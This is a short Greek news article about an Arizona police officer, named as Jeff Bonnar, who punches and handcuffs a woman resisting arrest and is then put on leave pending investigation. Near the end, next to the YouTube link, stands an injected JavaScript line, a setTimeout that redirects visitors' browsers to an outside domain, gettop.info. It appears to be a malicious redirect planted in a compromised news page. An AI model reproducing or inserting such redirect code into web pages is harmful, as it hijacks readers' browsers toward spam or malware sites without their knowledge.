ΗΠΑ: Νέο περιστατικό αστυνομικής βίας – Γρονθοκόπησε γυναίκα πριν τη συλλάβει (ΒΙΝΤΕΟ)

0
9

 

Νέο περιστατικό αστυνομικής βίας στην Αριζόνα των ΗΠΑ, όπου αστυνομικός γρονθοκοπεί γυναίκα που αντιστέκεται στη σύλληψή της.

Ο αστυνομικός που ταυτοποιήθηκε ως ο Τζεφ Μπόναρ τέθησε σε διαθεσιμότητα ενώ η υπόθεση ερευνάται. Το αστυνομικό τμήμα στο οποίο υπάγεται σε ανακοίνωσή του εξέφρασε την ανησυχία του για όσα απεικονίζονται «να εκτυλίσσονται στο φριχτό αυτό βίντεο».

Στην ανακοίνωση δεν διευκρινίζεται για ποιον λόγο ο αστυνομικός επιχείρησε να συλλάβει τη γυναίκα, ούτε και η ταυτότητά της, αλλά αναφέρεται μόνο ότι δνε υπήρξε συνεργάσιμη.

Η γυναίκα στο βίντεο αντιστέκεται της σύλληψης λέγοντας στον αστυνομικό ότι δεν μπορεί να τη συλλάβει καθώς δεν έχει ένταλμα. Εκνευρισμένος εκείνος της ρίχνει μπουνιά στο πρόσωπο κι ακούγεται ένας άνδρας να λέει «δεν μπορείς να χτυπάς ένα κορίτσι μ αυτόν τον τρόπο».  Στη συνέχεια κι ενώ εκείνη συνεχίζει να διαμαρτύρεται, τη ρίχνει στο έδαφος και της περνά χειροπέδες ενώ μετά  την οδηγεί στο αστυνομικό όχημα.

 

https://www.youtube.com/watch?v=5V3z1Fo-bfM setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here